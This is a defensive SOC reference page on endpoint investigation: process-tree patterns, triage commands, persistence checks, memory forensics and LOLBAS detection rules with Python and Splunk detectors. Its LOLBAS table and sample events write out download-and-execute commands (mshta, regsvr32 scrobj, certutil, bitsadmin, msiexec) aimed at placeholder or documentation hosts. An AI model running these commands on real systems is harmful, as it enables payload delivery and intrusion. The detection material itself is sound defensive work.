---
title: "Endpoint investigation — EDR & Artefacts"
domain: security
subdomain: soc
phase: 02-investigation
type: snippet
tags: [soc, endpoint, EDR, process, persistence, memory, DFIR]
difficulty: advanced
status: stable
updated: "2025-05-13"
---
## Suspicious process trees

| Pattern | Meaning | ATT&CK |
|---|---|---|
| `WINWORD.EXE → powershell.exe` | Malicious Office macro | T1566.001, T1059.001 |
| `EXCEL.EXE → cmd.exe → net.exe` | Macro downloading a payload | T1059.003 |
| `outlook.exe → wscript.exe` | Malicious script attachment | T1566.001 |
| `explorer.exe → cmd.exe → net.exe` | Manual execution by an attacker | T1059.003 |
| `lsass.exe → [any child]` | Injection into lsass (very rarely legitimate) | T1055 |
| `svchost.exe → powershell.exe` | Malicious service or WMI execution | T1047, T1059.001 |
| `msiexec.exe → rundll32.exe → regsvr32.exe` | LOLBAS chain | T1218 |
| `wscript.exe → powershell.exe -enc` | VBS dropper script | T1059.005 |
| `regsvr32.exe /s /u /i:http://...` | Squiblydoo bypass | T1218.010 |
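The rows above are ancestor chains, so a detector has to walk the parent pointers of each process rather than look at one parent/child pair. The following Python is an added example (not code from the original page): it transcribes the table's chains into regexes, walks the lineage of every process in a constructed snapshot, and reports the matching chain with its ATT&CK ids. The process records and the `Proc`/`detect_chains` names are assumptions made for the demo.

```python
"""Match the parent/child chains from the table above against a process list.

Added example, not from the original page: the process records are constructed
and the chain patterns are transcribed from the table (ancestor first).
"""
import re
from dataclasses import dataclass


@dataclass
class Proc:
    pid: int
    ppid: int
    name: str       # image name as reported by the EDR / pslist
    cmdline: str


# Each step is a regex searched (case-insensitively) in "<name> <cmdline>", so a
# step can also constrain arguments (the "-enc" of the VBS dropper row).
CHAINS = [
    ([r"^winword\.exe\b", r"^powershell\.exe\b"], "Malicious Office macro", ["T1566.001", "T1059.001"]),
    ([r"^excel\.exe\b", r"^cmd\.exe\b", r"^net\.exe\b"], "Macro downloading a payload", ["T1059.003"]),
    ([r"^outlook\.exe\b", r"^wscript\.exe\b"], "Malicious script attachment", ["T1566.001"]),
    ([r"^explorer\.exe\b", r"^cmd\.exe\b", r"^net\.exe\b"], "Manual execution by an attacker", ["T1059.003"]),
    ([r"^lsass\.exe\b", r"."], "Child of lsass.exe (injection)", ["T1055"]),
    ([r"^svchost\.exe\b", r"^powershell\.exe\b"], "Malicious service or WMI execution", ["T1047", "T1059.001"]),
    ([r"^msiexec\.exe\b", r"^rundll32\.exe\b", r"^regsvr32\.exe\b"], "LOLBAS chain", ["T1218"]),
    ([r"^wscript\.exe\b", r"^powershell\.exe\b.*-enc"], "VBS dropper script", ["T1059.005"]),
]


def ancestry(by_pid, pid):
    """Return [process, parent, grandparent, ...]; stops on a missing or cyclic
    ppid (PID reuse can make the parent pointers of a snapshot loop)."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid])
        pid = by_pid[pid].ppid
    return chain


def chain_matches(pattern, lineage):
    """True if the direct lineage (child first) starts with the pattern read backwards."""
    steps = list(reversed(pattern))
    if len(lineage) < len(steps):
        return False
    return all(re.search(rx, f"{p.name} {p.cmdline}", re.IGNORECASE)
               for rx, p in zip(steps, lineage))


def detect_chains(procs):
    """Evaluate every process as the leaf of each chain; one finding per (pid, chain)."""
    by_pid = {p.pid: p for p in procs}
    findings = []
    for p in procs:
        lineage = ancestry(by_pid, p.pid)
        for pattern, meaning, attack in CHAINS:
            if chain_matches(pattern, lineage):
                findings.append({
                    "pid": p.pid,
                    "chain": " -> ".join(a.name for a in reversed(lineage[:len(pattern)])),
                    "meaning": meaning,
                    "attack": attack,
                })
    return findings


# Constructed snapshot: a macro spawning PowerShell, explorer -> cmd -> net,
# a child of lsass, plus benign noise that must not fire.
SAMPLE = [
    Proc(4, 0, "System", ""),
    Proc(700, 4, "wininit.exe", "wininit.exe"),
    Proc(800, 700, "lsass.exe", "C:\\Windows\\system32\\lsass.exe"),
    Proc(1200, 4, "explorer.exe", "C:\\Windows\\explorer.exe"),
    Proc(2100, 1200, "WINWORD.EXE", '"C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE" invoice.docm'),
    Proc(2300, 2100, "powershell.exe", "powershell.exe -nop -w hidden -enc AAAA"),
    Proc(2400, 1200, "cmd.exe", "cmd.exe /c whoami"),
    Proc(2500, 2400, "net.exe", "net user"),
    Proc(3000, 800, "cmd.exe", "cmd.exe"),
    Proc(3100, 1200, "cmd.exe", "cmd.exe /c dir"),   # benign: explorer -> cmd alone is not a chain
]

if __name__ == "__main__":
    for f in detect_chains(SAMPLE):
        print(f"PID {f['pid']:>5}  {f['chain']:<40} {f['meaning']} {f['attack']}")
```

Matching on `<name> <cmdline>` rather than on the name alone is what lets the `-enc` constraint live in the same pattern list; on a real EDR export, feed the same `Proc` records from the process-creation events and keep the cycle guard, because PID reuse in a long snapshot does produce loops.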

---

## Process investigation commands

### Windows

```powershell
# Process list with path and hash (processes whose Path is not readable are dropped)
Get-Process | Where-Object Path | Select-Object Name, Id, Path, @{
  N='Hash'; E={(Get-FileHash $_.Path -EA 0).Hash}
} | Format-Table -Auto

# Processes with active network connections
Get-NetTCPConnection -State Established | ForEach-Object {
  $proc = Get-Process -Id $_.OwningProcess -EA 0
  [PSCustomObject]@{
    LocalAddr  = $_.LocalAddress
    LocalPort  = $_.LocalPort
    RemoteAddr = $_.RemoteAddress
    RemotePort = $_.RemotePort
    PID        = $_.OwningProcess
    Process    = $proc.Name
    Path       = $proc.Path
  }
} | Format-Table -Auto

# Full process tree (Get-CimInstance also works on PowerShell 7, where Get-WmiObject no longer exists)
Get-CimInstance Win32_Process | Select-Object ProcessId, ParentProcessId, Name, CommandLine |
  Sort-Object ParentProcessId | Format-Table -Auto

# Injected processes — unusual modules
tasklist /m /fi "STATUS eq running" | findstr /i "{{SUSPICIOUS_DLL}}"
```

```cmd
REM Quick command-line triage
tasklist /v /fo csv > c:\temp\tasklist.csv
REM wmic is deprecated on recent Windows builds; fall back to Get-CimInstance above if it is missing
wmic process get ProcessId,ParentProcessId,Name,CommandLine /format:csv > c:\temp\processes.csv
netstat -nao > c:\temp\netstat.txt
```

### Linux

```bash
# Suspicious processes — parents/children
ps auxf --sort=-%cpu | head -40

# Processes with network sockets (-a lists established sockets, not only listeners;
# root is needed to see other users' PIDs, otherwise the pid= field is absent)
ss -tunap | grep -oP 'pid=\K[0-9]+' | sort -un | \
  xargs -I{} sh -c 'echo "PID: {}"; ls -la /proc/{}/exe 2>/dev/null'

# Processes with no binary on disk (fileless, or deleted after exec)
for pid in $(ls /proc | grep -E '^[0-9]+$'); do
  exe=$(readlink /proc/$pid/exe 2>/dev/null)
  if echo "$exe" | grep -q "(deleted)"; then
    echo "DELETED: PID=$pid EXE=$exe CMD=$(cat /proc/$pid/cmdline 2>/dev/null | tr '\0' ' ')"
  fi
done

# Files opened by a suspicious process (sockets, pipes, anonymous memory: regular files and directories are filtered out)
lsof -p {{PID}} 2>/dev/null | grep -v "REG\|DIR" | head -30
```
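The `/proc` loop above is the quickest check for processes whose executable is gone from disk. The Python below is an added example (not code from the original page) that reimplements it with the two cases a triage script has to handle: an `exe` link ending in ` (deleted)` and a `/memfd:` backed executable, while skipping kernel threads and entries it cannot read. It ships a constructed fake `/proc` tree so it can be exercised offline; `find_deleted_exes` and `build_fake_proc` are names chosen for the demo.

```python
"""Find running processes whose executable no longer exists on disk.

Added example, not from the original page: a Python version of the /proc loop
above, with a constructed fake /proc tree so it runs offline.
"""
import os
import tempfile


def find_deleted_exes(proc_root="/proc"):
    """Return [{pid, exe, cmdline}] for PIDs whose /proc/<pid>/exe link target
    ends in " (deleted)" (binary unlinked after exec) or starts with "/memfd:"
    (executed from an anonymous memory file). Unreadable entries are skipped:
    kernel threads have no exe link and other users' processes need root."""
    findings = []
    for entry in os.listdir(proc_root):
        if not entry.isdigit():          # skip self, sys, net, ...
            continue
        pdir = os.path.join(proc_root, entry)
        try:
            exe = os.readlink(os.path.join(pdir, "exe"))
        except OSError:
            continue
        if not (exe.endswith(" (deleted)") or exe.startswith("/memfd:")):
            continue
        try:
            with open(os.path.join(pdir, "cmdline"), "rb") as fh:
                # argv is NUL-separated; an empty cmdline means a zombie or kernel thread
                cmdline = fh.read().replace(b"\0", b" ").decode("utf-8", "replace").strip()
        except OSError:
            cmdline = ""
        findings.append({"pid": int(entry), "exe": exe, "cmdline": cmdline})
    return sorted(findings, key=lambda f: f["pid"])


def build_fake_proc():
    """Constructed /proc lookalike (not a real kernel view) used for the demo:
    one healthy daemon, one binary deleted after launch, one memfd-backed process."""
    root = tempfile.mkdtemp(prefix="fakeproc-")

    def add(pid, exe_target, argv):
        pdir = os.path.join(root, str(pid))
        os.makedirs(pdir)
        os.symlink(exe_target, os.path.join(pdir, "exe"))   # readlink returns the target string verbatim
        with open(os.path.join(pdir, "cmdline"), "wb") as fh:
            fh.write(b"\0".join(a.encode() for a in argv) + b"\0")

    add(1, "/usr/lib/systemd/systemd", ["/sbin/init"])
    add(4242, "/dev/shm/.x (deleted)", ["./.x", "-c", "198.51.100.7"])
    add(4311, "/memfd:payload (deleted)", ["payload"])
    os.makedirs(os.path.join(root, "self"))                  # non-numeric entry, must be ignored
    os.makedirs(os.path.join(root, "77"))                    # pid dir without an exe link (kernel thread)
    return root


if __name__ == "__main__":
    for f in find_deleted_exes(build_fake_proc()):
        print(f"DELETED: PID={f['pid']} EXE={f['exe']} CMD={f['cmdline']}")
```

Run it against the real `/proc` with `find_deleted_exes()` as root. A ` (deleted)` target is also what a daemon shows after a package upgrade replaced its binary while it kept running, so compare the process start time with the package install time before escalating.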

---

## Checklist — Persistence

<Checklist items={[
  "Run / RunOnce registry keys (HKLM & HKCU)",
  "Scheduled Tasks (schtasks /query /fo LIST /v)",
  "Services (sc query type= all state= all)",
  "Startup folder (C:\\Users\\*\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup)",
  "WMI Event Subscriptions (Get-WMIObject -Namespace root/subscription -Class *)",
  "DLL Hijacking — DLLs missing from the system32 path vs the application folder",
  "Boot/Logon Autostart — HKLM\\SYSTEM\\CurrentControlSet\\Services",
  "Suspicious browser extensions",
  "Legacy AT tasks (at command)",
  "COM Object hijacking (HKCU\\Software\\Classes\\CLSID)",
  "AppInit_DLLs (HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows)",
  "Image File Execution Options (IFEO) — debugger key"
]} storageKey="soc-endpoint-persistence" />

```powershell
# Persistence audit — Run keys
Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
Get-ItemProperty "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce"

# WMI subscriptions — advanced persistence (T1546.003)
Get-WMIObject -Namespace root/subscription -Class __EventFilter
Get-WMIObject -Namespace root/subscription -Class __EventConsumer
Get-WMIObject -Namespace root/subscription -Class __FilterToConsumerBinding

# Scheduled Tasks — full action content, keeping the task path/name so a hit can be traced back
Get-ScheduledTask | Where-Object State -ne "Disabled" | ForEach-Object {
  $task = $_
  $task.Actions | ForEach-Object {
    [PSCustomObject]@{ TaskPath = $task.TaskPath; TaskName = $task.TaskName; Execute = $_.Execute; Arguments = $_.Arguments }
  }
} | Where-Object { $_.Execute -match "powershell|cmd|wscript|mshta|regsvr" }
```

---

## Velociraptor / EDR — Artefact collection

```sql
// Velociraptor — VQL query for endpoint investigation (run from a notebook or hunt)
SELECT *
FROM Artifact.Windows.System.Pslist()
WHERE CommandLine =~ "(?i)(base64|enc|http|Download)"   // "enc" alone is noisy: tune the pattern on your fleet

// Collect all persistence artefacts (one query per cell)
SELECT * FROM Artifact.Windows.Persistence.PermanentWMIEvents()
SELECT * FROM Artifact.Windows.System.ScheduledTasks()
SELECT * FROM Artifact.Windows.Registry.RunKeys()
```

```bash
# EDR CLI — isolate a host (CrowdStrike Falcon example)
# Via the Falcon API (the token needs the device-control scope)
curl -X POST "https://api.crowdstrike.com/devices/entities/devices-actions/v2?action_name=contain" \
  -H "Authorization: Bearer {{FALCON_TOKEN}}" \
  -H "Content-Type: application/json" \
  -d '{"ids": ["{{DEVICE_ID}}"]}'
```

---

## Memory forensics — Volatility 3

```bash
# Volatility 3 — install and basic usage (pip installs the `vol` entry point;
# `vol.py` is the equivalent when running from a source checkout)
pip install volatility3

# Memory image — process list
vol -f memory.dmp windows.pslist

# Process tree
vol -f memory.dmp windows.pstree

# Network connections found in memory
vol -f memory.dmp windows.netscan

# Injected code detection (executable private memory regions, e.g. MZ headers outside mapped images)
vol -f memory.dmp windows.malfind --pid {{PID}}

# DLLs loaded by a process
vol -f memory.dmp windows.dlllist --pid {{PID}}

# Dump the memory of suspicious processes
vol -f memory.dmp windows.memmap --pid {{PID}} --dump

# Open handles
vol -f memory.dmp windows.handles --pid {{PID}}

# Strings in a process' memory: windows.strings does not extract strings itself,
# it maps the offsets of a `strings -t d` listing to their owning process
strings -a -t d memory.dmp > memory.strings
vol -f memory.dmp windows.strings --strings-file memory.strings --pid {{PID}} | grep -iE "(http|cmd|powershell|VirtualAlloc)"
```

---

## Timeline — plaso / log2timeline

```bash
# Build a full timeline of a Windows system (disk image)
log2timeline.py --parsers win7,winreg \
  --storage-file /output/timeline.plaso \
  /mnt/evidence/image.dd

# Filter and export to CSV
psort.py -o l2tcsv \
  -w /output/timeline.csv \
  /output/timeline.plaso \
  "date > '{{START_DATE}}' and date < '{{END_DATE}}'"

# Quick search for suspicious events
grep -i "powershell\|psexec\|mimikatz\|lsass" /output/timeline.csv | head -50
```

---

## LOLBAS — Abuse detection

| Binary | Abuse technique | Suspicious command | ATT&CK |
|---|---|---|---|
| `mshta.exe` | HTA/VBS execution | `mshta http://{{LHOST}}/evil.hta` | T1218.005 |
| `regsvr32.exe` | Squiblydoo — remote DLL | `regsvr32 /s /u /i:http://{{LHOST}}/evil.sct scrobj.dll` | T1218.010 |
| `certutil.exe` | Payload download | `certutil -urlcache -split -f http://{{LHOST}}/payload.exe` | T1105 |
| `bitsadmin.exe` | Persistent download | `bitsadmin /transfer job http://{{LHOST}}/evil.exe c:\tmp\evil.exe` | T1197 |
| `wscript.exe` | Script execution | `wscript //e:VBScript //b evil.js` | T1059.005 |
| `rundll32.exe` | DLL execution | `rundll32 \\{{LHOST}}\share\evil.dll,DllMain` | T1218.011 |
| `msiexec.exe` | Remote MSI install | `msiexec /q /i http://{{LHOST}}/evil.msi` | T1218.007 |
| `odbcconf.exe` | Execution proxy | `odbcconf /s /a {REGSVR evil.dll}` | T1218.008 |

```splunk
# Splunk — LOLBAS detection with network arguments
index=windows EventCode=4688 earliest=-24h
  (NewProcessName="*certutil*" AND CommandLine="*http*")
  OR (NewProcessName="*mshta*" AND (CommandLine="*http*" OR CommandLine="*\\\\*"))
  OR (NewProcessName="*regsvr32*" AND CommandLine="*scrobj*")
  OR (NewProcessName="*bitsadmin*" AND CommandLine="*transfer*")
  OR (NewProcessName="*rundll32*" AND CommandLine="*\\\\*")
| table _time, host, SubjectUserName, NewProcessName, CommandLine
| sort _time
```
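To test the same logic outside Splunk (or to replay it over an exported batch of 4688 events), here is an added Python example that is not code from the original page. The rules mirror the search above branch by branch, with the `msiexec` and `odbcconf` rows of the table added, and the events are constructed to carry the 4688 field names the search uses; `detect_lolbas` and `LOLBAS_RULES` are names chosen for the demo.

```python
"""Apply the LOLBAS detection above to process-creation events in Python.

Added example, not from the original page: the events are constructed with
Windows event 4688 field names and the rules mirror the Splunk search, with
ATT&CK ids taken from the table.
"""
import re

# (image regex, command-line regex, technique). The first five pairs are the
# branches of the Splunk search; the last two come from the table's extra rows.
LOLBAS_RULES = [
    (r"\\certutil\.exe$", r"https?://", "T1105"),
    (r"\\mshta\.exe$", r"https?://|\\\\", "T1218.005"),      # URL or UNC path
    (r"\\regsvr32\.exe$", r"scrobj", "T1218.010"),
    (r"\\bitsadmin\.exe$", r"\btransfer\b", "T1197"),
    (r"\\rundll32\.exe$", r"\\\\", "T1218.011"),             # DLL loaded from a UNC share
    (r"\\msiexec\.exe$", r"https?://", "T1218.007"),
    (r"\\odbcconf\.exe$", r"regsvr", "T1218.008"),
]


def detect_lolbas(events):
    """Return one hit per event that matches a rule (first matching rule wins),
    in time order, with the columns the Splunk `table` command produces."""
    hits = []
    for ev in sorted(events, key=lambda e: e["_time"]):
        image, cmd = ev["NewProcessName"], ev["CommandLine"]
        for image_rx, cmd_rx, technique in LOLBAS_RULES:
            if re.search(image_rx, image, re.IGNORECASE) and re.search(cmd_rx, cmd, re.IGNORECASE):
                hits.append({"_time": ev["_time"], "host": ev["host"], "user": ev["SubjectUserName"],
                             "image": image, "technique": technique, "cmd": cmd})
                break
    return hits


def _ev(t, image, cmd):
    """Constructed 4688-style event on a single host/user (demo data, not a real log)."""
    return {"_time": t, "host": "WS-0142", "SubjectUserName": "jdoe",
            "NewProcessName": image, "CommandLine": cmd}


# Four abuses from the table interleaved with two benign uses of the same binaries.
SAMPLE_4688 = [
    _ev("2025-05-13T09:01:02", r"C:\Windows\System32\certutil.exe",
        "certutil -urlcache -split -f http://203.0.113.5/a.exe"),
    _ev("2025-05-13T09:01:10", r"C:\Windows\System32\certutil.exe",
        r"certutil -hashfile C:\tools\a.exe SHA256"),                        # benign: no URL
    _ev("2025-05-13T09:02:30", r"C:\Windows\System32\regsvr32.exe",
        "regsvr32 /s /u /i:http://203.0.113.5/a.sct scrobj.dll"),
    _ev("2025-05-13T09:03:15", r"C:\Windows\System32\mshta.exe",
        r"mshta \\203.0.113.5\share\a.hta"),                                 # UNC, no http
    _ev("2025-05-13T09:04:00", r"C:\Windows\System32\rundll32.exe",
        r"rundll32 C:\Windows\System32\shell32.dll,Control_RunDLL"),         # benign: local DLL
    _ev("2025-05-13T09:05:40", r"C:\Windows\System32\bitsadmin.exe",
        r"bitsadmin /transfer job http://203.0.113.5/b.exe C:\tmp\b.exe"),
]

if __name__ == "__main__":
    for h in detect_lolbas(SAMPLE_4688):
        print(f"{h['_time']} {h['host']} {h['user']} {h['technique']} {h['cmd']}")
```

The image regexes anchor on the file name at the end of `NewProcessName`, which is stricter than the `*certutil*` wildcards in the search and avoids matching a renamed copy in an unrelated path by accident; if renamed LOLBins are a concern on your fleet, match on the original file name or hash from the EDR instead.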

<Tip>Check the integrity level of the parent process: a "Medium Integrity" child spawned by a "High Integrity" process is normal during an elevation, but the reverse (a High child from a Medium parent with no visible UAC) is a marker of non-standard privilege escalation to investigate immediately.</Tip>
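Applying the tip above to process-creation telemetry means comparing each child's integrity level with its parent's and flagging only the upward direction. The Python below is an added example, not code from the original page: it works on constructed Sysmon-style events, ranks the integrity levels, and treats a `consent.exe` start on the same host within `uac_window_s` seconds before the child as the "visible UAC" the tip refers to. That time window and the function names are assumptions made for the demo, not a documented Windows guarantee.

```python
"""Flag child processes running at a higher integrity level than their parent.

Added example, not from the original page: constructed events, and a UAC
correlation window (uac_window_s) that is an assumption to tune per fleet.
"""
LEVELS = {"Low": 0, "Medium": 1, "High": 2, "System": 3}


def find_integrity_inversions(events, uac_window_s=60):
    """Return children whose integrity level exceeds their parent's. A Medium
    child of a High parent is the normal direction and is never reported."""
    by_pid = {e["pid"]: e for e in events}
    consent = [(e["host"], e["ts"]) for e in events if e["name"].lower() == "consent.exe"]
    found = []
    for e in sorted(events, key=lambda x: x["ts"]):
        parent = by_pid.get(e["ppid"])
        if parent is None or LEVELS[e["il"]] <= LEVELS[parent["il"]]:
            continue
        # "visible UAC": the consent prompt process started shortly before the elevated child
        uac_seen = any(h == e["host"] and e["ts"] - uac_window_s <= t <= e["ts"] for h, t in consent)
        found.append({"pid": e["pid"], "name": e["name"], "il": e["il"],
                      "parent": parent["name"], "parent_il": parent["il"],
                      "uac_prompt_seen": uac_seen})
    return found


def needs_immediate_triage(events):
    """The subset the tip calls out: an elevated child with no UAC prompt nearby."""
    return [f for f in find_integrity_inversions(events) if not f["uac_prompt_seen"]]


# Constructed events (ts in seconds, Sysmon-style fields): one elevation through
# a UAC prompt, one without, and one normal downgrade that must not fire.
SAMPLE = [
    {"ts": 100, "host": "WS-0142", "pid": 1200, "ppid": 4,    "name": "explorer.exe", "il": "Medium"},
    {"ts": 130, "host": "WS-0142", "pid": 1500, "ppid": 900,  "name": "consent.exe",  "il": "System"},
    {"ts": 131, "host": "WS-0142", "pid": 1600, "ppid": 1200, "name": "cmd.exe",      "il": "High"},    # user clicked through UAC
    {"ts": 400, "host": "WS-0142", "pid": 1700, "ppid": 1200, "name": "cmd.exe",      "il": "High"},    # no prompt: investigate
    {"ts": 410, "host": "WS-0142", "pid": 1800, "ppid": 1600, "name": "notepad.exe",  "il": "Medium"},  # downgrade: normal
]

if __name__ == "__main__":
    for f in find_integrity_inversions(SAMPLE):
        flag = "" if f["uac_prompt_seen"] else "  <-- no UAC prompt"
        print(f"PID {f['pid']} {f['name']} ({f['il']}) from {f['parent']} ({f['parent_il']}){flag}")
```

Keep the inversion with a nearby prompt in the output as well: it is the baseline that shows what a legitimate elevation looks like on the host, and it is the record you compare against when the un-prompted one turns up.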
